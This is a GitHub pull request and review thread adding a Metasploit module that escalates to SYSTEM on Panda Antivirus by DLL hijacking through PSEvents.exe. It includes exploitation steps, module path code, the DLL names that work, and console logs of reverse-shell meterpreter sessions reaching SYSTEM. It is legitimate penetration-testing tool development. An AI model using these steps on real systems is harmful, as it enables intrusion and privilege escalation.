### PR TITLE
Panda Antivirus Priv Esc

### PR DESCRIPTION
**Pull request by h00die**
Adds Windows priv escalation for Panda Antivirus.
## Verification
- [x] Install Panda Antivirus Pro 2016 via links provided in markdown.  Confirm the Downloads folder is created (can take a little time for Panda to create it, maybe an hour?)  `check` can confirm.
- [x] Start `msfconsole`
- [x] get user shell on box
- [x] Do: `use exploit/windows/local/panda_psevents`
- [x] Do: `set session #`
- [x] Do: `check`
- [x] Do: `exploit`
- [x] Go do something else while you wait up to an hour
- [x] Enjoy being system with your shell

Panda caught my meterpreter, so I added an exclusion for the downloads folder.  Depending how crafty you are you may or may not need to do this as well

### CODE REVIEW

File: modules/exploits/windows/local/panda_psevents.rb [hunk 1]
```diff
@@ -0,0 +1,108 @@
...
+        OptInt.new('ListenerTimeout', [true, 'Number of seconds to wait for the exploit', 3610]),
+      ], self.class)
+  end
+
+  def get_path()
+    case sysinfo['OS']
+    when /Windows (7|8|10|2012|2008)/
+      return 'C:\\ProgramData\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171\\'
+    when /Windows (NT|XP)/
+      return 'C:\\Documents and Settings\\All Users\\Application Data\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171\\'
```
Comment (OJ) [inline modules/exploits/windows/local/panda_psevents.rb]: Would it not be better to use environment variable expansion for these paths?

Comment (egypt) [inline modules/exploits/windows/local/panda_psevents.rb]: It definitely would be better. These paths are localized, so this won't work on non-English systems

Comment (h00die) [inline modules/exploits/windows/local/panda_psevents.rb]: Best paths I could find to get to the right place were: 
```
'%ProgramData%\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171\\'
```
and
```
'%AllUsersProfile%\\Application Data\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171\\'
```

**Comment by h00die** [comment]
Should be an easy review, software is linked (twice over), drop a dll and wait.  Maybe this is a good candidate for review today so it can be done by the weekend?

**Comment by OJ** [comment]
I understand the desire for a bump. Ease up on the pressure buddy, they're
working pretty hard already!

**Comment by sgonzalez-r7** [comment]
@h00die, i've started reviewing your PR.  I downloaded and installed http://filehippo.com/download_panda_antivirus_pro_2017/download/b436969174c5ca07a27a0aedf6456c89.  I've confirmed AV is running.  I've waited over an hour, and the C:\\ProgramData\\Panda Security\\Panda Devices Agent\\Downloads folder has not appeared.  I'm running on Win 7 64-bit.  Am I missing something?

**Comment by h00die** [comment]
hmm, i know i had to wait, but it was maybe 15min and boom the folder appeared.  Maybe a reboot?  Is the system still Internet accessible?  I believe it pulls those files from the panda site, so if it cant reach the interwebs, it may not make the folder(s).  Thats all I can think of

**Comment by h00die** [comment]
@sgonzalez-r7 did the folder appear?  I can setup wireshark and see how long it takes on mine and if theres an external call, but my assumption is that there is since i have no other way to explain rando files showing up from the software

**Comment by sgonzalez-r7** [comment]
@h00die,  no it still hasn't appeared.  I restarted.  I verified internet access.  My firewall is also turned off.  I like your idea of using Wireshark.  Can you take a look on your end, and I'll setup Wireshark on my end?  See if we can figure something out.

**Comment by h00die** [comment]
Between 12 and 14minutes on my 8.1 x86 box.
Theres an HTTP GET request to 23.215.132.154 for /retail/psprofiler/40032/psprofiler_suite.exe
Then right after HTTP GET request to 23.215.132.154 for /retail/psevents_suite.exe

Which gave me a downloads folder with the 1a2d7253f106c617b45f675e9be08171 with PSEvents.exe and 1fc14858021fb3ec80c30feaa517f886 with PSProfiler in it.

I can test a different box, but this was a fresh 8.1.  Double check the About says Version 16.1.2 for Panda Antivirus 2016.  I'm running out of ideas here, id say if it doesn't make the folder within 20min, its time to abandon.  I did the default install w/o bloatware (no yahoo homepage etc), and only clicked not to register.  No options were done after that.

**Comment by pbarry-r7** [comment]
I attempted to validate this PR with my Win 8.1 x64 VM. I got Panda AV installed (unchecking all boxes in the dialog that wanted to install more crap, closing the modal that wanted me to activate Panda, then clicking on the thing to enable the protection/scanning), saw the expected Downloads folder show up (took just a hair under 10 minutes for me), and set an exception for AV to not check my Downloads folder (so my msfvenom-created EXE wouldn't get whacked).

But I'm seeing the following error (per the disclaimer, it did take almost an hour before it completed):

```
$ ./msfconsole
                                                  
Call trans opt: received. 2-19-98 13:24:18 REC:Loc

     Trace program: running

           wake up, Neo...
        the matrix has you
      follow the white rabbit.

          knock, knock, Neo.

                        (`.         ,-,
                        ` `.    ,;' /
                         `.  ,'/ .'
                          `. X /.'
                .-;--''--.._` ` (
              .'            /   `
             ,           ` '   Q '
             ,         ,   `._    \
          ,.|         '     `-.;_'
          :  . `  ;    `  ` --,.._;
           ' `    ,   )   .'
              `._ ,  '   /_
                 ; ,''-,;' ``-
                  ``-..__``--`

                             http://metasploit.com


       =[ metasploit v4.12.28-dev-3b548dc                 ]
+ -- --=[ 1584 exploits - 901 auxiliary - 272 post        ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/multi/handler
msf exploit(handler) > set lhost 10.0.2.4
lhost => 10.0.2.4
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > run

[*] Started reverse TCP handler on 10.0.2.4:4444 
[*] Starting the payload handler...
[*] Sending stage (957999 bytes) to 10.0.2.5
[*] Meterpreter session 1 opened (10.0.2.4:4444 -> 10.0.2.5:58847) at 2016-10-19 06:42:26 -0500

meterpreter > getuid
Server username: windows81-pb\standardbob
meterpreter > sysinfo
Computer        : WINDOWS81-PB
OS              : Windows 8.1 (Build 9600).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/win32
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/panda_psevents
msf exploit(panda_psevents) > set lhost 10.0.2.4
lhost => 10.0.2.4
msf exploit(panda_psevents) > set session 1
session => 1
msf exploit(panda_psevents) > run

[*] Started reverse TCP handler on 10.0.2.4:4444 
[*] Uploading the Payload DLL to the filesystem...
[*] Starting the payload handler, waiting for PSEvents.exe to process folder (up to an hour)...
[*] Start Time: 2016-10-19 06:42:49 -0500
[!] This exploit may require manual cleanup of '%ProgramData%\Panda Security\Panda Devices Agent\Downloads\1a2d7253f106c617b45f675e9be08171\CRYPTBASE.dll' on the target
[*] Exploit completed, but no session was created.
msf exploit(panda_psevents) > sessions

Active sessions
===============

  Id  Type                   Information                         Connection
  --  ----                   -----------                         ----------
  1   meterpreter x86/win32  windows81-pb\standardbob @ WINDOWS81-PB  10.0.2.4:4444 -> 10.0.2.5:58847 (10.0.2.5)

msf exploit(panda_psevents) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: windows81-pb\standardbob
```

I can try on an x86 VM today and see if I have any better luck...

**Comment by h00die** [comment]
Only thing I can think of is checking the DLL payload is for the right architecture.  Other than that check the windows logs like in the markdown, maybe there's something in there. It looks like to me the exe started,failed loading the DLL and most likely crashed, which then after an hour it just quit. Maybe the exe can only load x86 DLLs or it has to match the arch, not sure. I'll see about a 64bit VM tonight to see if I can help as well

**Comment by pbarry-r7** [comment]
Heyya @h00die, I did try a Win 7 x86 VM I had handy.  The Panda AV would detect the bcryptPrimitives.dll and CRYPTBASE.dll files when they were uploaded into the ```C:\ProgramData\Panda Security\Panda Devices Agent\Downloads\1a2d7253f106c617b45f675e9be08171\``` directory and quarantine them.  If I excluded that directory from being scanned, using CRYPTBASE.dll didn't result in a new session with system privs, but using bcryptPrimitives.dll *did* result in a new session with system privs (woo!):

```
.
.
.
<meterpreter session started via "standardbob", my standard-level Windoze user>
.
.
.
msf exploit(panda_psevents) > set DLL bcryptPrimitives.dll
DLL => bcryptPrimitives.dll
msf exploit(panda_psevents) > run

[*] Started reverse TCP handler on 10.0.2.4:4444 
[*] Uploading the Payload DLL to the filesystem...
[*] Starting the payload handler, waiting for PSEvents.exe to process folder (up to an hour)...
[*] Start Time: 2016-10-19 13:42:02 -0500
[*] Sending stage (957999 bytes) to 10.0.2.10
[*] Meterpreter session 2 opened (10.0.2.4:4444 -> 10.0.2.10:49989) at 2016-10-19 14:10:27 -0500
[!] This exploit may require manual cleanup of '%ProgramData%\Panda Security\Panda Devices Agent\Downloads\1a2d7253f106c617b45f675e9be08171\bcryptPrimitives.dll' on the target

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : PBARRY-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/win32
meterpreter >
```

I went and removed the scan exclusion for the ```C:\ProgramData\Panda Security\Panda Devices Agent\Downloads\1a2d7253f106c617b45f675e9be08171\``` directory and tried WINHTTP.dll.  While it didn't get picked up by the Panda scan, it failed to yield a new session:

```
.
.
.
msf exploit(panda_psevents) > set DLL WINHTTP.dll
DLL => WINHTTP.dll
msf exploit(panda_psevents) > run

[*] Started reverse TCP handler on 10.0.2.4:4444 
[*] Uploading the Payload DLL to the filesystem...
[*] Starting the payload handler, waiting for PSEvents.exe to process folder (up to an hour)...
[*] Start Time: 2016-10-19 14:25:28 -0500
[!] This exploit may require manual cleanup of '%ProgramData%\Panda Security\Panda Devices Agent\Downloads\1a2d7253f106c617b45f675e9be08171\WINHTTP.dll' on the target
[*] Exploit completed, but no session was created.
```

Clearly there's some YMMV aspect, but I'm of the mind this is good to land.  Will defer to @sgonzalez-r7 since he grabbed the ticket first and was having some issues getting his Panda install to create the Downloads directory. 

Nice work, @h00die!  👍

**Comment by h00die** [comment]
In this case I'd like to at least update the docs and do a little more testing to determine if it's a x64 thing, and which DLL work or not.

**Comment by pbarry-r7** [comment]
Sounds good.  In the couple of times I tested with my Win 8.1 x64 VM, I don't believe I tried any DLL other than the CRYPTBASE.DLL.  I can fire it up this evening and try a couple other DLLs, as well (I am curious spin up my Win 7 x86 VM and try the DLLs I didn't try earlier to see what I get there).

**Comment by h00die** [comment]
I won't argue assistance. Testing 6 or so dlls on 2 architectures at 1 or 2 DLL arch's at 60min a shot is like 24hrs to test them all... But I want this to work, be documented, verified and be clear cut, so just let me know OS arch, payload, and DLL!

**Comment by h00die** [comment]
I'll throw up a test matrix later to keep track

**Comment by h00die** [comment]
|                                                               | WINHTTP.dll | VERSION.dll | bcryptPrimitives.dll | CRYPTBASE.dll | cryptnet.dll | WININET.dll |
|---------------------------------------------------------------|-------------|-------------|----------------------|---------------|--------------|-------------|
| 64bit target (1), 64bit win - windows/meterpreter/reverse_tcp |             |             |                      |               |              |             |
| 64bit target (1), 64bit win - windows/meterpreter/reverse_tcp |             |             |                      |               |              |             |
| 32bit target (0), 32bit win - windows/meterpreter/reverse_tcp |             |             |                      |               |              |             |
| 32bit target (0), 32bit win - windows/meterpreter/reverse_tcp |             |             |                      |               |              |             |

I'll start filling it in shortly, i figure 'valid' and 'NO' should be obvious enough.

**Comment by h00die** [comment]
@pbarry-r7 wow, you got a bcrypt to land... maybe there really is some nuances between SYSTEM running it and Admin....

**Comment by pbarry-r7** [comment]
Nice matrix!  My apologies for getting back on later than expected.

Sounds good, @h00die, I'll do that and post back here... (gonna let SYSTEM run PSEvents.exe)

**Comment by pbarry-r7** [comment]
cryptnet.dll worked on my Win 8.1 VM x64, using 64-bit meterpeter)

Am testing with my Win 7 VM (x86, 32-bit meterpreter) right now, but I did have to set an exclusion in the Panda 'Antivirus' setting to not scan that Downloads folder because it would detect cryptnet.dll's upload and remove it.  I'll update this comment shortly with if the privesc was successful...

**Comment by h00die** [comment]
All good. Thanks for the update. I'll get this wrapped up today or tomorrow!

**Comment by h00die** [comment]
@pbarry-r7 @sgonzalez-r7 all fixed up.  I still can't get bcrypt to work, but maybe its a win7 thing.  Regardless, its documented and people can do what they want if they don't wish to use the obviously best (and default) choice!

**Pull request merged**